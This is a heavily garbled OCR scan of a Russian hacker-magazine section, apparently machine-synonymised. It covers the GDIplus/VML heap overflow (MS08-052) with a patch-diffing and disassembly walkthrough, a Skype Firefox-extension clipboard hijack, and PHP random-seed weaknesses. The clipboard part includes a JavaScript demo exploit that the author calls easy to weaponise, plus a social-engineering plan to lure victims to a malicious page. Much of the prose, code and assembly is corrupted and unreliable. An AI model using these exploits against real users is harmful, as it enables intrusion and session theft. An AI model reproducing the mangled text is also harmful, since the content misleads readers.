претендовал в стандарт, олицетворенный держи распознавание  организации ѴѴЗС. Впрочем, боль-  шого распространения ѴМбтак равно отнюдь не получил да на неподдельный миг  (опционально) его поддерживает лишь только Ѳоодіе Марз.   В частности, ниженазванный адрес выводит получи щит начинать мазаный эллипс: «<ѵ:  оѵаі збу1е="розібіоп :  аЬзоІибе; 0ебб:0; бор:0;  ѵѵісИгіі: ЮОрх; ЬеідЬб : 00рх”  Еі11со1ог="Ыие " />».  Девятого октября взломщик бгед  МасМапивизѴегіВідп отправил во Юеіепзе бабв оповещение об  обнаруженной им уязвимости на ѴМб, деловито реализо-  ванной на динамической библи-  отеке ѲйіРІиз . (311 (ІОеІепве  І_аЬв платит следовать информацию что до  дырах). Краткое техническое обрисовка проблемы допускается отрыть сверху ІаЬв.ісІе(еп5е.сот/  іпІеШаепсе/ѵиІпегаЫІІІІеа/   43 равным образом на офици-  альном бюллетене безопас-  ности М508-052: ао.тісгозоН.  сот/1ѵѵІіпк/?ЕіпкІсі=1 05468 . Не  помешаеттакже спускаться равным образом в  сайт Веси гііу Ро сив, идеже прореха      РЬЕОМАХ Максимум комфорта   а аепаіЫе Ьіі о! 0АМ81ІМ0        ѵѵѵѵѵѵ.затзипдріеотах.сот   8АМ81ЛЧС С&Т          Б ЭЛОМ     Бсаппіпд 0=ог ^ипсхіопг ,  рйгзіпд 0есопс( ісІЬ..*  рйГ 0 і пд 04 Г5 X. і йЬ « ■ .  сИ Т"ГІ пд.   Хйеп^ісаі ічіпс^іопе; 0367   магсііесі Гипссіопз: с   ІІпта^сИесІ Типс^іопа 0; 050   иіптассііед ічлісЫопе г: іге     сЗоое 0     г     АК; ісііе    Ооюп    ОІ5І    4БОМ6       Резулыатсравнения непатченной равным образом исправленной версий библиотеки С □ I ріиз.сііі утилитой РаІсЬОІЛ     проходит подина номером #31020: ѵѵѵѵѵѵ.весигИѵІосиа.сот/Ьіб/ЗІ 020 .   Однако ни сам с сих ресурсов далеко не дает ответа держи вопрос: на чем,  собственно, состоит сила программы да каким образом материализовать  переполнения. Зарывшись на глушь д изассембл ер ных листингов, автор памяти выяснил, аюшки? налаженность позволяет строить эллипсы из  отрицательным фокусом, а безграмотный умеет соображать широта дина-  мической памяти, требующийся с целью их размещения (тривиальное  целочисленное обуревание на процессе умножения]. В результате  происходит классическое захлестывание кучи, приводящее для воз-  можности удаленного захвата управления со всеми вытекающими отселе последствиями.     >> Тагдеіз     ІЕ 0. 0/6. 0, СЖІсе ХР, ОГІІсе 0007/ВР1/ВР2/ВРЗ, ѴѴогсІ 0003/ВРЗ, РоѵгегРоіпі  Ѵіеѵѵег 0007/ВР1 , Ехсеі Ѵіеѵѵег 0003/ВРЗ, ЕхсеІѴІеѵгег2007/5РЗ.     >> ЕхрІоіі|     _Іобп5ті1:ЫВася Пупкин] изо хакерской группировки Еѵіі Ріпдегв     : мН ■ _к*с*іі инікі^пцліпіічіНіпжі ппг    ТОМ НМІ      1 Г 0 ПІІ • - ! • * " ІѴ.ММ И і Т,Л. |Я|      ріг    -1«*ч      рі    14*1    М4Ѵ 01 * |НПІ    ріт    -1*1      рі г    Кіи    > -• * - ішііі    рі» 0    І    - ІМТІ    р1>    -і*    |г ^ і * гіиігг)    ріг    •    * ішііі    ртг    вш      ртг    1.    Й1*к>    рЬр,    ч* ЦЗ    л-іР      ІНі    тѵ для ля    I -СІ?р ■ -II ц 0 |    ртк    *№      и*м    РЙ-в л      Г ГІ.С    нІ’і ч ,    ѵЯіЕ    рйѴІі        ррч-Н    РЦІ      мь    іі-г.і    ■** і:|, го і    Іи*-    ЛІ-М- 0 ]сс Ѵ»й*С*    •в*    нН ■:        І гГ Ч    ■ѵій-_С| на ѵ&л    іа г / тт юс. -      ; ЕНО! N 0 Р ■: :і-:т1і-і:і    йі»    Ж,    | ■гСір "■ і да і] Р|    п»ѵ    "Л,    1 *■- 0 «м; ; *.:іННі|М    К ші    Р.І1 л    гііг ; --«іні ішінлкш---      шля    і ГіФуЧіг-і    (111    Ср№І1есб4 ; ІІ"ІІ-П 0 Ч.. і :■ 0    Г гч    !М ( ,       ■ патча     [ ѵѵ"л/ѵѵ.еѵііііпаегз.сот ). выпустил ргооі-оі-сопсері ехріоіі, какой позволительно скачать в духе от официального сайта группы — бЛр://  еѵіЩпдег5.сот/оа1сЫие5СІаѵ/М508 052 0РІ+ ѴиІпегаЬНІІѵ.М . та для равным образом не без; независимых сайтов: сіоѵѵпІоасІз.БесигИѵІосиБ.сот/ѵиІпегаЬЦИІеБ/  ехрІоіІз/ЗІ 01 0.ЫтІ.М .     >> Боіиііоп     Самое радикальное да самое надежное заключение (какуже отмечалось  выше] — встретить равным образом отвести библиотеку ОБІрІиз . сЗ.1 X , ввиду всё-таки равняется ее шишка на ровном месте на поверку далеко не использует.   РАСШИРЕНИЕ «5КѴРЕ» ДЛЯ  РІКЕРОХ   ДОСТУП К БУФФ ОБМЕНА —     >> Вгіе*     Какое касательство имеет Вкуре для ѲОІ+? Как позволяется угнетать чувствительность во ІЕ от Горящего Лиса? Оказывается — можно! Со-  циальная инженерии на совокупности  со систематическим подходом  делают свое дело!   Седьмого октября 0008 в тіЬл/Огт"е появился ехрІоН, намалеванный  польским хакером от труднопроизносимым ником Ігк4з. Он демонст-  рирует направленную атаку получи и распишись задница обмена после Вкуре-расшире-  ниедля ГорящегоЛиса [ бирзѴ/беѵеІорег.зкѵре.сот/ВкѵреТооІЬагв І.  пользующееся внушительный популярностью да предустановленное бери  множестве компьютеров да ноутбуков.   Подробности — на блоге первооткрывателя дыры [ ігкДг.щогсІргевв.  сот ], кстати, прежде этих пор пока что безвыгодный засветившейся получи и распишись Весите РосиБ’е.  Наверное, сие потому, ась? хаккер изъясняется чрезвычайно бери поль-        Скайповое развертывание для ГорящемуЛису      ► 054     ХАКЕР 01 /119/ 08            Товар сертифицирован. Реклама. хакинг       ском языке. Мой потребление предлагается ниже: «Я есть ошибку во  Скайповом расширении к Горящего Лиса, позволяющую модифи-  цировать целый жопень обмена сообразно своемуусмотрению. Забавно, зачем данное растяжение автоматично устанавливается инсталля-  тором Зкуре, приблизительно аюшки? доля уязвимых машин необходимо присутствовать архи  велико. Описанная брешь похожа нате намедни обнаруженную уязви-  мость, открывающую подступ ко буферу обмена через АбоЬе  Ріазб равным образом АсііопЗспрІ, сколько позволяет каста кующему жонглировать его  содержимым». А идеже но тогда ІЕ? А смотри где! Скидываем жертве ссыл-  ку держи сайт, сообщая, что-то его нужно взирать исключительно сквозь ІЕ.   Пусть сие хорэ тот или другой пригожий сайттипа "л/ѵѵѵѵ.агсте.сот .  амытемвременем неощутимо подменяем местожительство на буфере обмена равно в отдельных случаях дар вставит его во ІЕ, возлюбленная как не без; неба свалился окажется возьми ѵѵѵѵѵѵ.  ^гее-5Ыиѵ-Ьо5бпо.сот/-Ііа[ѵаѵа/еѵі[.Ніт[ . идеже ее поимеет озлобленный  НТМБ-код, эксплуатирующий одну изо вышеописанных дыр на ІЕ.     >> Тагде1з|     Уязвимость подтверждена на Зкуре ехіепзіоп іог Рі геГох ВЕТА 0.2.0.95.  Про остальные версии нуль невыгодный известно.     >> ЕхрІоіі|     Демонстрационный ехріоіі позволительно скачать не без; тіІѵѵОгт.сот/ехрІоіІ.  р М р ?і сі=6690 либо — либо обратиться исходным кодом, приведенным вниз (чтобы обернуть его на боевую модель, шабаш убрать  комментарии, домовито вставленные автором):   ДЕМОНСТРАЦИОННЫЙ ЕХРІ_ОІТ,   ЛЕГКО ПРЕВРАЩАЕМЫЙ В БОЕВОЙ   <а1ігеі:="#" опс1іск=" сЬеск_іЪ ( ) ; " >кезк іС!</а>  <зсгірк Суре=" СехС / ] аѵазсгірС " >   бипсСіоп сору_Со_с1ірЪоагс1 ( СехС ) {  іб ( зкуре_Соо1 ) {   ѵаг сору_іС=СехС + " \0+" ; //изе пиіі ЬуСе Со сору  ѵаіие, Ьесаизе " + " сЬаг шизС Ье іп зСгіпд  зкуре_Соо1 . сору_пиш ( сору_іС );   }   }   бипсСіоп сЬеск_іС ( ) {   //сору_Со_с1ірЬоагсі ( "шаіісіоиз СехС ! !!!!!!!!! ! \п\      Графическая показывание результатов сравнения непатченной равно  исправленной версии библиотеки ЭОІрІиз.сШ     сот/ 0 ) ;   сору_Ьо_с1ірЪоагс1 ( " кССр : / /шаіісіоиз . Ііпк . Со .Ъасі .  раде/ " ) ;   аІегС ( 0 Бопе I СЬеск уоиг сІірЬоагсП " ) ;   }   </зсгірС>     >> БоІиНоп     Внимательно топтать ради буфером обмена. Это единственное «ле-  карство», существующее держи текущий день.   ВБІ+ ІЫТЕКЫАІ.5   Несмотря возьми то, в чем дело? библиотечка ОВІрІив.йІІ используется токмо  Офисом равно ІЕ, возлюбленная стоиттого, с намерением на ней покопаться ломом получи и распишись пред-  мет поиска свежих багов... МісгозоГі, на правах водится, затыкает ощутительно более ошибок, нежели описывает на бюллетенях безопасности. Да равно те  затыкает впопыхах, равным образом исключительно со следующий третей попытки ей удается ра-  зогнать бардак, вернее, обойти баги с одного места на другое. Как  показываетхакерский опыт, совокупное наличность ошибок представ-  ляет с лица константу, осциллирующую округ некоторого значения.  Библиотека ЭОІрІиБ.сШ. интересна до этот поры да тем, сколько позволяет проде-  монстрировать поместительный армада хакерскихтехник, использующихся     РЬЕОМАХ Максимум звука   а зепзіЫе Ьіі о? 0АМ51ЛѴС         ѵѵѵѵѵѵ. затзипдріеотах.сот   8АМ81ЛЧС С&Т           Наша подопытная находится в 04-м месте на списке таісітесі-функций пользу кого анализа патчей. Сравнивая оригинальную равно пропаченную вер-  сию, пишущий сии строки найдем, который собственно исправила МісговоН равным образом локализуем дыру неразлучно  со обстоятельствами ее проявления. Сравнивать, естественно,  будем утилитой РаісЬСШ — бесплатным аналогом коммерческого  плагина ко ЮА Рго, скрывающимся вслед невразумительным названием  ВМИГ.   Однако РаІсІЮІІТ обнаруживает чрезвычайно числа различий, большая доля изо которых нам неинтересна да целиком непригодна ни интересах  локальных, ни, тем более, для того удаленных атак. РаІсГЮІН, конечно,  мощное оружие, так хакерствовать за всем тем нельзя не головой.  Дедуктивный путь (активно использовавшийся Шерлоком Холм-  сом) позволяет отсеять огромное сумма «холостых» функций в  ранних стадиях анализа. Пару выпусков отворотти-поворотти наша сестра не вникая в особь дела описывали потенциал Ра(сЬ0і(Га. Теперь, когда-никогда твоя милость еще каплю освоился из  ним, пришла момент перемещаться с пассивного созерцания для активному  вторжению во механический код.   Нам потребуется ЮА Рго 0.2 тож раньше (ЮА Рго 0.3 во действительнос-  ти представляет с лица немаленький Ьид-біх) . Бесплатная вариация отнюдь не под-  держивает плагинов, же эту проблемулегко решить, найдя на Сети тож  Осле статьи бери тему «ЮА Рго пользу кого бедных». РаШНйіН денег отнюдь не просит равно отчего общедоступен — саіТепаЫевесипІѵ.сотЛепаЫе/раІсМІЮ  рЬр.Авот разыскание графической библиотеки ѲОІрІив.сІЦ гораздо паче  проблематичен, нежели сие видимое дело возьми главный созерцание — усердствовать бессчетно  версий да по сию пору такие разные. Я решил выложить анализируемые биб-  лиотеки возьми нестандартный сервер, тем более они ге-сПвІгіЬиіаЫе. Качай — пегиті.  ога.ги/воигіт/ОРІоІив.гаг .   Открываем пропатченную версию во ЮА Рго, дожидаемся окончания  процесса дизассемблирования равно выходим с ИДЫ, выгружая базу во і б Ь -файл. Открываем оригинальную версию, дизассемблируем.  Затем лезем во список «Ебіі Ріидіпв» равным образом зовем «РаІсЬШІ» иначе не мудрствуя лукаво  нажимаем <СТПІ_-8>, открывая прежде сохраненную базу пропатчен- утнапиштим версии библиотеки. Даем РаІс1ЮІ(Ту похалтурить минут от полчасика  (на Ре піі да сообразно - 0 0 0 Соррегтіпе) да втыкаем на результат.   А некто таков: 0 09 таісбеб- функций (парных функций, на которых  найдены различия — основных кандидатов получи шутцпункт президента,  тьфу, во хранители багов); 076 иптаісИеб-функций (тех, которые  отличаются столько сильно, что такое? РаІсЬБІД"у отнюдь не посчастливилось сопос-  тавить их доброжелатель от другом ; баги после этого и тотально вероятны, да высматривать их — тухлое дело, требующее счета с ручным управлением работы); 0367  идентичных функций (полностью совпадающих доброжелатель  со другом;  баги здесь, неравно да есть, так кочующие через одной версии для другой, ведь снедать неисправленные).   В с та кая, значит, ситуация. С учетом размера библиотеки (1 ,7 Мб) величина тэісЬесІ -функций малограмотный та ко контия равно велико, однако, во пересчете получи естественные считанные единицы (пиво, сигареты) место приземленно  безнадежно. Даже даже если для разбирательство каждой функции расходовать поряд-  ка 0 0 минут, в таком случае движение завершится сквозь 019 00/60=1 .190/60=20  часов. С учетом реальной производительности труда нам потребу-  ется объединение меньшей мере под масть дней напряженной работы, вдобавок без  всяких гарантий для успех, поелику отыскиваемый адрес может быть  виптаісбеб- функциях. На иханализ уйдет лишше недели! Да следовать сие сезон безвыездно умственные способности скурить можно, а изо пивных бутылок сотворить  скульптуры на стиле «Москва наноситудар согласно Церетели».   А что-нибудь буде у до такого склада степени одна баночка пива равно больше пачки сигарет? Ус-  пеемлимы довершить анализ? Успеем! Главное — произвести конспект да толково ему следовать. Тупое попарное сверка функций однажды неграмотный  возбуждает.   ► 056      ^ Г          ТІ ■" I т     р И 0 іёіш I ■ * Л. ішѵр *■ М |р*   РабсИОІГГ — мощная обслуживающая программа про сравнения патчей, распространяемая в бесплатной основе     В самом деле, ухватки противника хоть куда известны. Почему бы безвыгодный намести оплеуха на особенно вероятные места локации? Может, кто именно пом-  нит детские проказа середины 00х? Всякие лабиринты, согласно которым  катается шарик? Я (да равным образом отнюдь не мы один) уж позднее выяснил, что-то просунуться путаница вернее малограмотный вместе с начала, а от конца (вообще-то, по чести сконс-  труированный ухо вынужден фигурировать для этому параллелен, чисто токмо  правильных лабиринтов кругом нас напористо безграмотный наблюдается да чаще  попадаются бракованные).   Также равно здесь. Переполнение кучи (если таковое есть) завязано для  функциях изо серии НеарАІІос, вызываемых напрямую не так — не то а вследствие  обертки вроде таііос тож пей. Целочисленное обуревание постоянно  (хотя равно безграмотный всегда) связано вместе с машинной командой ІМШЗ. Вот их-то наша сестра равно будем разыскивать на дизассемблерном тексте, а лучше на таісбеб-функ-  циях. Быстро, по доступной цене равно сердито. Результат, конечно, далеко не гарантиро-  ван, только нам везет, равным образом дырявая круг обязанностей обнаруживается совершенно помощью сколько-нибудь минут стучания до клавиатуре.   Вотона— іпр збсісаіі зиЬ_4ЕО096ЕБ (НІССЩ Мсоп, іпр).   Тутсразу равно ІШЬ, равным образом требование НеарАІІос, притом молодчага ЮА Рго  распознала НеарАІІос даже если закачаешься вложенной функции, как следует  определив ассигнование передаваемого ей параметра в духе ФиВуРез.  Возьмем этоттрюк сверху заметку!     ФУНКЦИЯ БИБЛИОТЕКИ С0ІРШ5.0БІ, НАЙДЕННАЯ  ДЕДУКТИВНЫМ МЕТОДОМ (ПРИВЕДЕН ИСПРАВЛЕННЫЙ ВАРИАНТ)   . Рехр : 0ЕВ09 0ЕВ   ; іпр зСйсаІІ 0иЪ_4ЕВ09 0ЕВ (НІСОЫ Ысоп, іпр)   . СехС : 0ЕВ096ЕВ зиЪ_4ЕВ09бЕВ ргос пеаг  ; СОВЕ ХКЕЕ: зиЬ_4ЕВ09ВЕ2+32р     Сехб : 0ЕБ097БЕ      шоѵ еах.    [ еЬр+ѵаг_42С . ЪтіНеасІег . ЬіНеідІіІ: ]    бехб : 0ЕБ097Е4      шоѵ есх.    [еЬр+ѵаг_42С .ЪтіНеасІег .ЪіМіббЪ]    бехб : 0ЕБ097ЕА    ссід    бехб : 0ЕБ097ЕВ    хог еах, есіх    бехб : 0ЕБ097ЕБ    зиЬ еах, есіх    бехб : 0ЕБ097ЕР    пед еах    Сехр : 0ЕБ097Е1    ітиі есх, еах    СехР : 0ЕБ097Е4    пед есх    бехб : 0ЕБ097Е6    зЪІ есх, 0    бехб : 0ЕБ097Е9    ризЪ есх    ; сЫВубез    // размер выделяемого блока    бехб : 0ЕБ09830    саіі зиЬ_4ЕС52209     ; / /внутри этой функции спрятан НеарАІІос     . Рехр : 0ЕС522 09   ; іпр зЬйсаІІ зиЬ_4ЕС52209 (ВИОКВ йиВуРез )   . РехЬ : 0ЕС52209 зиЬ_4ЕС52209 ргос пеаг     ХАКЕР 01 /119/ 08     Товар сертифицирован. Реклама. хакинг       СехС : 0ЕС522 09    Ъехс : 0ЕС522 09 сІмВуЪез=дмогд    1 рЬг 0    СехС : 0ЕС522 09    ЬехЬ : 0ЕС52209    тоѵ    есіі , есіі    Ъехі: : 0ЕС522 0В    ризЬ    еЬр    ЬехЬ : 0ЕС522 ОС    тоѵ    еЬр, езр    Ьехі: : 0ЕС522 0Е    ризЪ    [еЬр+сЫВуЬез    ; йтоВуЪез    ЕехС : 0ЕС52211    ризЬ    0    ; сЫРІадз    СехС : 0ЕС52213    ризіі    ІіНеар    ; ІіНеар    Ііехі: : 0ЕС52219   ; // видишь некто ! !    саіі   і    сіз : НеарАІІос    Ъехі: : 0ЕС5221Р    рор    еЬр    Ьехі: : 0ЕС5222 0    геЬп    4    СехС : 0ЕС5222 0 зиЪ_    _4ЕС522 09    епсір     Кстати, наша подопытная располагается во списке таісбесі-функций бери почетном 04-м месте. То есть, что-то около к примеру посередине, да отчего подыскивать ее тупым попарным перебором пришлось бы архи  долго. Атак... наш брат потратили получи сие — считанные минуты. Конеч-  но, помимо везения тогда необошлось.нос второй стороны, как-никак равно вместе с  ножом у горла пустое место безвыгодный стоял! Задача хакерства — перебороть мишень вместе с сверхзвуковой скоростью, а целей с целью атаки ощутительно больше, нежели  свободного времени. Если нападение крепости завершился провалом, автор просто-напросто переходим ко следующей — вишь равно все!   Кстати, забавная доскональность — оплошка -то отнюдь никак не там, хотя бы равно во функ-  ции зиЪ_4ЕБ096ЕБ (НІСОЫ Мсоп, іпр ) ! Непатченная разночтение  «забывала» инициализировать раздолье ЬтіНеайег .ЬіНеідЫ; равным образом вследствие чего на пофиксенной библиотеке появилась майна «тоѵ еах,  [еЬр+ѵаг_42С . ЪтіНеасІег . ЬіНеідЫ: ] », которую, именно го-  воря, равно «запеленговал» РаісНОІОі Однако, заблуждение никуда никак не исчезла,  а как бы была, эдак равно осталась.   Команда ІШЬ (смотри строку« . Еехр : 0ЕВ097Е1 ітиі есх,  еах») подвержена целочисленному переполнению, основательно опи-  санному во блоге 0есигііѵ[аЬ5.уѵеЬзеп5е.сот/сопіеп1:/ВІоа5/31 08.азрх   (уязвимость парсера КІ_Е-файлов во ВОІ+), идеже приводится бажная равно  исправленная версии библиотеки ѲБІрІиз . <311.   При всей внешней схожести в кругу этими примерами естьсущест-     : «оій ■ ѵЫ[*И Вгса<М4ч**""ЗГ*йІ. Е ІіЛп+і Г^рж* НдВММРІнрО    Т»«[>вИ»Ч«жЧЧІ Ни 0 нР іаИВДГНЯШіМрЛ          і ппі іЛІГ: с«і>.. "чьи ■ і і«и і    Мі» "Ь    ■ ІІІМГІІ    р-Іг    иг-    1ЫГ II    ■ іішгіі    ГІ г    14    шѵ"іа    - Ніізігіі      ІН    іНЛуІгч.    - ііігіі ІІ    ріг    КН    Ѵ4Г.І    - Лі*Т<1    ЦТ    *    Ц4* Ч    ■ ііимп)    тіг    ■ ь    «Ч 0    - [Нмгй *пг    V    Ч    - анчгй    ?гг    КН    -ч равным образом    ■ ІІІЯГІІ    рі Г    1*      ти    #41.    г4І.      ричЬ          #вш      «1      киИ      ІІЬ              мім    «и*    1      гіІІІІ    |тЬ(г    ■чГѵ«г | . І      Ъг-Л      СІЬ      Ѵ«ІѴ    1 тЬ(п    "ТІГ %| Р ГЫ      |дг    Ѵ1ПІ ■    : іс і ч во на ічі      ■ -| 0    [>Ь|і"ЫііГ Ч |    т        : «К 01 Г ; р*н*рс<ичргя"      лім          *іі    | »- 0 |і--таг ч      ІГІ    ЧЧ.Д 0,        ріі "■ Гі    #*я    • Т иі-ІІТ»а І.ВСИ *      рчъН    ■Г -1.1        ріічЬ    Тіі    ь ІП-(ІГ-".І 0-ПМ-Н-      і.ііі    ІМ иг -5 гпціаш іігтиЭТСІ РГЙШ/ г Ячпдынді     После патча     венное различие. В нашем случае ШШУ используется интересах детекции  целочисленного переполнения (М5ѴС да некоторые люди часть компилято-  ры автоматично вставляют код, препятствующий передаче функции  НеарАІІос самоочевидно некорректных значений). А видишь на примере,  взятом изо блога, устав ІШЬ задействована во вычислении тре-  буемого размера блока выделяемой памяти. Совсем неграмотный одно да так же!  Поэтому самовольно сообразно себя ІМШУ — вновь безвыгодный паспорт наличия дыры да прежде, нежели продумать окончательное заключение, необходимо проверить граничивший для ней код. Конечно, сие требует  времени, да код, вставляемый компилятором, до смерти характе-  рен да распознается от первого взгляда. А как бы собственно симпатия борется из переполнением, со всеми подробностями рассказывается на блоге одного изо  сотрудников МісговоИ: Ыоав.тзсІп.сот/тісЬаеІ боѵѵагсІ/агсЫѵе/2  005/1 0/06/500629.азрх .-з-     РІ-ЕОМЛХ Максимум информации   а зепзіЫе Ьіі оі $АМ$ІІІЧС       ѵѵѵѵѵѵ.затзипдріеотах.сот   $АМ$ШМС С&Т ^^2^33^       А     »     ВЗЛОМ     2 . 0 . 0 . . 0 . 0 . ". 0 . 0 .     2 . 0 . 0 . 0 . 0. 0 # 0 . 0 . 0 . 0 . 0.2     / ІСО 084888, НТТР://ѴѴАР-СНАТ.ГШ /     2 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0.2   2 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0.2   2 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0.2   2 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0.2   2 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0.2   "НЕСЛУЧАЙНЫЕ  ■ЧИСЛА     1 . 0 . 0 . 0.2     о. э.     5 . 0 . 0 . 0 . 0 . 0.2     ВЗЛОМ ГЕНЕРАТОРА СЛУЧАЙНЫХ ЧИСЕЛ — ІЛ.ТІМАТЕ-БАГ ДВИЖКА РНР     эксоксоксокс относительно   Недавно обнаруженная известиьім_ІТ Зесигйу специалистом Стефаном а     Эссером чувствительность на интерпретаторе РНР умозрительно может дотронуться огромное число веб-сайтов, бери которых используется РНР<=5.2.5. Тебе интер   ПТ >1- 0 - ж. ш ж ш ж « ■ - » для   но, во нежели существо уязвимости? В статье мы разобрал ааѵізогу бага в области полочкам. 0     ес-     а г затрагивает функции генерации псевдослучайных чисел  гапй() равным образом тр_гаш} (). Зачастую они используются на  создания паролей, сессий, кукисов да других различных  конфиденциальных данных пользователя.   КапйО — сие прямо враппер ради библиотеки ІіЬс гапй( ) ,а  тр_гапсі( ) — враппер чтобы генератора псевдослучайных чисел Мегвеппе  Тѵѵізіег. Обе функции используюттак называемый веесі (семя), какой-никакой  можнозадаватьсоответственнофункциями вгапсЦ): равным образом тр_згапй ( ) .   По дефолту сид представляет собою 02-битный ШОКЛ (2 во 02 степени либо — либо  4294967296 комбинаций). Обычнотакой длины достаточно, дабы обес-  печить криптографическую прочность приложения. Ведь про брутфорса  пароля, сгенерированного из через одной с сих функций, нуждаться смыслить безграмотный лишь только сид, только равно сгенерированные получай его основе числа. Впрочем,  существует шеренга ситуаций, во которых брутфорс полностью применим...     Н ЗАТРАВКА   ВРНР4иРНР5<=5.2.0 присутствует следующая недоработка: кто хочешь  5ееб, вызываемый тр_вгапсі( ) , либо присваиваемый автоматически,  имеет разрядность лишь 01 бит, этак в качестве кого конечный двоичный знак ввек устанав-  ливается равным одному. Таким образом, к брутфорса семени нам  нужно напиться 0147483648 комбинаций. Уже лучше, только что ни говори интересах  эксплуатации такого бага времени накопить придется немало.   В последующих версиях РНР эту недоработку залатали, хотя оставили  другую. ВРНР4иРНР<=5.2.5всякийраз, эпизодически 06 последних двоичная единица информации  становятся равными нулю, веесі да силком становится  равным нулю (либо 0 , на зависимости отустановки принудительных двоичный знак системой). Это положение действует на 02-битных систем. На  64-битных системах дела с грехом пополам самое лучшее — сид нетрудно становится  24-битным.      > 058     ХАКЕР 01 /119/ 08 хакинг     >>     5 игрек!...     * В«М Мі.Нттгіг ВЧР иг<і »*|.     5 0 *   5   5  5  5     РНР і.З да для и! ОеІ-іуйи Спль Зііе Нііцмілі Рм"ул.* іНеѴ   I Ні ігм"кн игр   Шш іп. 0 ГІН к-» 0 №л ■■■>.   . Ь 0 0 ь.. ; 0 0 *ь* 0. 0 0 ■ I . іп 0 іб>* ьіт^г ■ ■■ равным образом сагіяи "■ іі.л"і ■ м ■ Иг Г-ІАА ■ ііі члг п мт  ІС. чЧіЬ *а~ч<« ічФ^І п И Ч Ідм-л 0 І «дкзгі.-в+і Р ■ .» Ш і ЫпИп.і   РРНІЫ- Йа-уі "■•*- ЫчЧ .тч* 0 ».* -Ни і*п т I" гм 0 анкіЬцн * Атл   €М >ІІ *!•« 04» і*МЧМ і| Г* -ЧМ41Л4 іИ I Ііі- іТі* -ч ІЛкІ   гшцт*ІІ^?гі*і *г - гіі;т іі ті Я-я Рг*Р ф . Ь пч Г р»а."К.лф   /і- а! иіі-"н Р.-*";ЧЛ ’. • ііг.і ■ . ."тігпЛіі] ІиІ и"ыіі ЛіАфіішл *іг РНР   "*" т " 0*3 0 И_вТ"** -Ріа Г..- н 0 0 *.» (■нчтлр"і */,«г Ьі"йрі | і| .-.ЦТ  ІР *ГЛ «Кр лиііг» ішгеш*. «г» Еаішн ліь рттаиН. ІРм Гпа*. а"і-і   Гпг»г*э «пРіг 0 Мр Ь.пі І.Р^|СІ* нЛЪсіЛ рж-ги-и. а 03 іт Ріаіп І.СЙСяЛ і!іі/   ■■ г чш ппд ыюйяа | РХС^ШТІ) ~ дЧ Ігмі Ь*41г ■ч"4ііч ігІНѵ*   Ги*Ь*Я_*Г**І (I ПСЕ Г 0 С Ьч ^ии": * Ч«>-+ч#Г ■»чіі^ГМ<іМЙ ЕИ№() От Т-»   йі’-Иэве-* ч* <э рк *-э “Б* " гч#ч 0 ^ г і_*ЯТ *?1 0 0 і "м^-рй *п*,   |.РіЮдс.*ЗТ М№ ІШ ■Т*|‘ттт« 0 «чв І.ЪСТ ІКа   т? **т пНр ушч і, на Б»Г,^#ІТ н 0І4ІФ# **і «И* ВДРіМ С*9Р* !*■ ■■«РпС  Гы^к- "■»р"Н‘"»іі-’чд ■■ г "чТлѴСгѵі гнй^   &*■* 0 ч* мы «-в-тг -1 ГІ « !* т , і   *щ*ш4 - РНР. I І-г-^*юИі і   КГ.ігінігку, ѴіЧІ І і ІпІв?лм-І лііс| Зои 0 0 ко Когсуі   У^І»Н>«| 00 *. ЗАМ Ьг 0 **!.-* Іиы пишущий эти строки *■«■. і елггм Ь Ен^Ѵ - іяіві «.этр 0 Р-*4 ліпрл?ч 0 #*гі 0 іЬыТ №■■ Р^дй й?с , г , г*А-зп равно 0  І іЕг ! •»< г* і ЩЩ , і *га<*зіч я.-чі ІфіИ ІА ч* ВіИ РЙ| 0 Лг I ІП М|  ■^МГ,ЙТ ...1*1. 0Ь«« т* — І*»Р ■«••-•-1 |#*||| «№«4 І.4г*.ь*.1 Л.р-   Ьв^грвг «я* рЬр ГагІ #гі I в-лі Ігг Ітчи* Іп Глг^-лпг іѵ Ям НЕА атк і і..**г ра |  1 0>| ^ ІРч 01 # *»#іѴ»Ир і ^ ді в^^ДМ *     &№іГі     Нам     НЯ 01 |     Ніійиіяі.     ГГ Н*Ь Г.%* ".ПГгЗ рвя**   зЬгіт О^РГН.   киііИ .РЪЪМП ^Р. (*, іРин   И»*.   гаійчіі Іпш Л для зюйд »пшчІ   ЗИЦ ■],   •лѵ{ Ф-а-аччг ’і"т"Ді, ТТіМ 0 а   Ад Ф*г,..   .►#1 в* Івиг ЛМ- зеш^ ? « ііѵпп 0  УРР ГЯІІНвГ . на равно жЫ .ЭГ, Аіп ті-лг^ч Ги* Гга овраг ■   ЬиІаЕ"і "глР, Г *я/і| ПН нвкшв  №   ТЫН-Ёъмі- •Н»* I   :ік4 рЯ   ЙаггЛ. ІРіРсЬ-"Иізя » ц . ІІЛ рди     ■;»‘П > ТІЯІІ *>ТЕ«Г.|іМІ     П&пЬііІ   Ырі"рг Ісаяз Йнп щі"я   Е.Мш*іЬр 0Р4Н   1-ляг.г :-л ■■■ 05{. ?м 03 Р.№     РлЦИ-5   -Епчжл 0 іюіь Е .*а ч   АпгІзЛилѵ   г-зчт+іт ."ЭіІЧ  ЗжЕанг*! .К$   Р.|^Т> ІІ" ін   іа\ іікя   ПЛлцііііві   Цзнрі ГЧ^НІІ  РзНі   «■. <И І41 и*Е  р.«|счт ІМЗЗ.ИП     Блог Стефана Эссера     а ПРИНУДИТЕЛЬНАЯ ГЕНЕРАЦИЯ 0ЕЕ0   Выше пишущий эти строки раскрыл одну сторону бага, а в эту пору — самое вкусное! Если твоя милость  любишь покопошиться во сорцах бесплатных РНР-цмсок, то, наверняка,  знаешь, в чем дело? их кодеры ужас любят инициализировать генераторы  псевдослучайных чисел подле помощи функций згапд() равным образом тр_згапсі():   тС_згапсЗ (Ьіте О);   т(:_згапсЗ ( (йоиЫе) тісгобітеО * 000000);  тС_згапй ( (йоиЫе) тісгоЬішеО * 0000000);  тб_згапй ( (йоиЫе) тісгобітеО * 00000000);   Такая инициирование невыгодный криптоустойчива, благодаря тому что что:   1. цель бітеО невыгодный является случайной. Ее сила будетизвестно  хакеру. Даже буде админы намеренноустановятлокальное момент сер- надежда ошибочным, — его точное роль ввек хорошенького понемножку повторяться во  НТТР-за головках;   2-4. на первом месте слагаемое (ОоиЫе) тісгобіте ( ) хорошенького понемножку равняется 0, либо 0 , а во-вторых — соответственно, с 0 00000 